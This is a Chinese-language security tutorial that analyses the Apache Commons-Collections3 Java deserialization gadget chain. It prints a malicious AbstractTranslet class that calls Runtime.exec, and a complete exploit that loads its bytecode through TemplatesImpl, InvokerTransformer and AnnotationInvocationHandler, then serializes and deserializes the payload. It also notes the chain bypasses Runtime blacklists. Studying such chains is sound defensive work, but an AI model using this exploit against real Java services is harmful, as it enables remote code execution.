Commons-Collections3
前言
CC1和CC6都是用Runtime.exec()
命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码,动态类加载可以看之前发的文章: Java动态类加载
漏洞分析
使用动态类加载来执行代码,就需要用到defineClass
类来处理字节码,将其处理为真正的Java类。但由于ClassLoader
类里的defineClass
都是protected属性,所以需要找到重写defineClass
类,且为public属性的地方。
这里没有注明属性,所以默认为default类型,那么只能在他的这个包底下才能访问。
然后接下来看看哪里调用了这里的defineClass
类
这里TemplatesImpl
类的defineTransletClass
方法调用了,但是它是private属性,继续查找谁调用了这里的defineTransletClass
方法
这里找到了getTransletInstance()
方法,这个方法有一个初始化的操作,所以只要走完这个函数,就能动态执行我们的代码了,这个方法同样是私有的,所以我们继续向上查找
在同一个类下,找到了newTransformer()
方法调用了getTransletInstance()
方法
只要调用了newTransformer()
方法就会调用getTransletInstance()
方法,然后就会触发_class[_transletIndex]
类的对象初始化
而这个类的赋值是在上面if语句里的defineTransletClass()
方法里进行的,这里对_class[i]
进行类加载
这里新建一个CC3Test,看一下能否执行代码,看一下TemplatesImpl类。
这里继承了两个接口,分别是Templates和Serializable,有了Serializable接口,也就能序列化了。
我们跟进到getTransletInstance()
函数里,这里的_name
需要赋值,否正会返回null
跟进到构造函数里,发现调用的无参构造啥也没干,所以我们需要给_name
赋值,其次如果_class
为空的话,会调用defineTransletClasses()
,这正是我们希望调用的,所以_class
不能赋值,接着我们跟进一下defineTransletClasses()
这里如果_bytecodes
为空的话,就会抛出异常了,所以_bytecodes
也需要赋值。然后下面需要调用_tfactory
的getExternalExtensionsMap()
方法,所以_tfactory
也需要赋值
接下来就差_tfactory
的赋值了,我们跟进后发现这是一个transient
修饰的变量,是不可被序列化的,所以现在需要看readobject
可以看到readObject里面是对_tfactory赋值了的,所以我们这里同样传入一个new TransformerFactoryImpl()
。
Field tfactoryField = tc.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
然后尝试运行一下,发现报了一个空指针的错误。
查看defineTransletClasses()
,下断点调试一下
最后发现这里的_auxClasses
是空的,原因是因为对这个传入的恶意字节码
的父类名是不是ABSTRACT_TRANSLET
,如果不是的话,就会调用_auxClasses
的put方法
所以能想到的解决方法:
- 让这个类的父类名为ABSTRACT_TRANSLET
- 给
_auxClasses
赋一个值
但是下面_transletIndex < 0
的话,就抛出异常跳出去了,而此时的_transletIndex
正是-1
,所以只能采取第一种方法,让恶意类继承这个com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet
package ClassLoader;
import java.lang.reflect.Method;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
public class Hacker extends AbstractTranslet{
public Hacker() throws Exception {
Class runtime = Class.forName("java.lang.Runtime");
Method exec = runtime.getMethod("exec", String.class);
Method getruntime = runtime.getMethod("getRuntime");
Object r = getruntime.invoke(runtime);
exec.invoke(r,"calc");
System.out.println("Hacker!!!");
}
public static void main(String[] args) {}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
所以只要调用了TemplatesImpl#newTransformer()
,就可以执行任意代码。因为这个用到了newTransformer()
,所以可以直接用到CC1的InvokerTransformer()
来调用newTransformer()
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer",null,null)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
成功执行代码,其实相比CC1来说,只改了后半部分执行命令的方式。CC1是利用InvokerTransformer()
调用Runtime#exec(),而CC3是利用InvokerTransformer()
调用newTransformer()
,实现动态类加载,执行我们传入的恶意类的代码。所以直接照搬后半部分就可以了。
package CC.CC3;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
public class CC3Test {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class tc = templates.getClass();
Field nameField = tc.getDeclaredField("_name");//给_name变量赋值
nameField.setAccessible(true);
nameField.set(templates,"aaaa");
Field bytecodesField = tc.getDeclaredField("_bytecodes");//给_bytecodes赋值
bytecodesField.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA 2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
byte[][] codes = {code}; //正常defineClass是传入一个一维数组,这里会进入for循环进行一个循环调用来进行defineClass类加载,我们只需要一个就行
bytecodesField.set(templates,codes);//这里是传入一个二维数组
Field tfactoryField = tc.getDeclaredField("_tfactory");
tfactoryField.setAccessible(true);
tfactoryField.set(templates,new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer("newTransformer",null,null)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
map.put("value","aaa");
Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);
Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
annotationInvocationhdlConstructor.setAccessible(true);
Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedMap);
serialize(o);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
成功执行代码,所以当过滤了Runtime类的时候,可以使用CC3来绕过黑名单。下面是流程示意图!